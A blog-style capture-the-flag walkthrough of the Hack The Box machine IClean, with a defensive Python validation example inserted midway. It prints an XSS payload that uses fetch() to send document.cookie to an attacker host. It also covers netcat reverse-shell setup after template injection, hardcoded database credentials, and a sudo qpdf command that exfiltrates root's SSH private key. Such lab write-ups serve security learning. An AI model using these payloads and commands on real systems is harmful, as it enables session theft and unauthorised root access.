Hack The Box - IClean

07 May 2024 . tech . Comments
#tutorial

Reconnaissance and Initial Steps

Nmap

sudo nmap -Pn -A 10.10.11.12

image

echo "10.10.11.12 iclean.htb" | sudo tee -a /etc/hosts

When I navigated to http://iclean.htb it redirected to http://capiclean.htb, so I added that host to /etc/hosts as well and accessed it.

echo "10.10.11.12 capiclean.htb" | sudo tee -a /etc/hosts

image

image

wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u "http://capiclean.htb/FUZZ" --hc 404 --hl 348

I found a /quote directory; let’s have a look.

I fired up Burp Suite, captured the requests, and tested various input vectors and payloads, and I identified a potential vulnerability that could be exploited further.

First I started a Python 3 HTTP server:

python3 -m http.server 1234

Then I put the payload below in the service parameter, URL-encoded it with Ctrl+U in Burp, and sent the request.

<img src=x onerror=fetch("http://ATTACK_IP:1234/"+document.cookie);>

image

Then after some time I received the cookie. Yooo!

Let’s set this cookie using Cookie-Editor and access /dashboard.

image

image

Visit http://capiclean.htb/InvoiceGenerator, fill in the form with arbitrary values, and generate an ID. The ID generated here is # 3873147880.

image

Then visit http://capiclean.htb/QRGenerator, fill in the above ID, and a QR code image link will be generated.

image

Let’s use Burp Suite to capture the request.

Web Exploitation

Among these requests you will see a POST request to /QRGenerator, which is likely vulnerable to SSTI: as this is a Flask application, it renders Jinja templates in the background.

image

To test it I put the basic payload `` in the qr_link parameter, and boom, I got 49 in the response.

image

I attempted to exploit further to achieve Remote Code Execution (RCE). However, I discovered that the typical Jinja2 Server-Side Template Injection (SSTI) payload was ineffective. Then I found this article, which helped me find a bypass payload:

https://kleiber.me/blog/2021/10/31/python-flask-jinja2-ssti-example/


So first I started a netcat listener:

nc -nlvp 4444

Then I put the payload in the qr_link parameter, URL-encoded it with Ctrl+U, and sent the request.

image

We were able to obtain a shell as www-data.
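The application-side root cause behind this step is that the qr_link parameter ends up inside the template source that Jinja compiles, so template syntax in it is evaluated. The fix is to treat the parameter as data: validate it as a URL and substitute it escaped. The following is an added example, not code from the box or from this writeup; the host capiclean.htb comes from the page, while the /qr/ path prefix, the function names and the test inputs are assumptions constructed for the example.

```python
import html
import re
from urllib.parse import urlparse

# Host from the writeup; the image path prefix is an assumption for this example.
ALLOWED_HOSTS = {"capiclean.htb"}
ALLOWED_PATH_PREFIX = "/qr/"

# Jinja2 delimiters ({{ }}, {% %}, {# #}) and an HTML tag opener: none of these
# belong in a parameter that should only ever hold an image URL, so their
# presence is a detection signal (SSTI or XSS probe), not just a validation error.
PROBE_RE = re.compile(r"\{\{|\{%|\{#|<[a-zA-Z/!]")


def classify_qr_link(value: str) -> tuple[bool, str]:
    """Validate qr_link as data, never as template source.

    Returns (accepted, reason). A rejection with reason "probe" is worth
    logging and alerting on; the other reasons are ordinary validation failures.
    """
    if PROBE_RE.search(value):
        return False, "probe"
    parsed = urlparse(value)
    if parsed.scheme not in ("http", "https"):
        return False, "scheme"
    if parsed.hostname not in ALLOWED_HOSTS:
        return False, "host"
    if not parsed.path.startswith(ALLOWED_PATH_PREFIX):
        return False, "path"
    return True, "ok"


def render_qr_fragment(value: str) -> str:
    """Build the <img> fragment for an accepted qr_link.

    The value is HTML-escaped and substituted into a fixed fragment. The
    vulnerable pattern exploited above is the opposite: concatenating the
    parameter into the template string before the engine compiles it.
    """
    accepted, reason = classify_qr_link(value)
    if not accepted:
        raise ValueError(f"qr_link rejected ({reason})")
    return '<img src="%s" alt="invoice QR code">' % html.escape(value, quote=True)
```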

User Flag

After traversing directories and examining files, I identified the app.py file, which contains hardcoded MySQL database credentials. Leveraging this discovery, I gained access to the database.

image

db_config = {
    'host': '127.0.0.1',
    'user': 'iclean',
    'password': 'pxCsmnGLckUb',
    'database': 'capiclean'
}

Before accessing MySQL, let’s upgrade the shell to a fully interactive TTY:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+Z
stty raw -echo; fg

Now let’s access MySQL:

mysql -h 127.0.0.1 -u iclean -p capiclean
show tables;
select * from users;

Enter the password that we found.

image

Let’s use CrackStation to crack the hashes: https://crackstation.net/

image

So let’s use this credential to log in as user consuela:

su consuela

image

Root Flag

sudo -l

image

So I can run the qpdf command via sudo. After searching Google I found its documentation: https://qpdf.readthedocs.io/en/stable/cli.html

First, use the --empty parameter to create an empty document. Next, use the --qdf parameter to write the PDF in QDF mode (uncompressed, so the content is readable as plain text). Then use the --add-attachment parameter to append a file as an attachment to the PDF. Here the attached file is root’s id_rsa, and the output file is named id_rsa.pdf.

Let’s run this command:

sudo /usr/bin/qpdf --empty --qdf --add-attachment /root/.ssh/id_rsa -- id_rsa.pdf

It generated id_rsa.pdf; let’s cat it.

image

image


Let’s create the id_rsa file, restrict its permissions with chmod 600 id_rsa, and use SSH with the -i option to specify the private key and connect to the server.

image


Me

c0d3cr4f73r is a cybersecurity enthusiast with a passion for red teaming and malware analysis. Based in Dubai, c0d3cr4f73r has extensive experience in offensive security operations. In their free time, they enjoy diving into the latest cybersecurity challenges.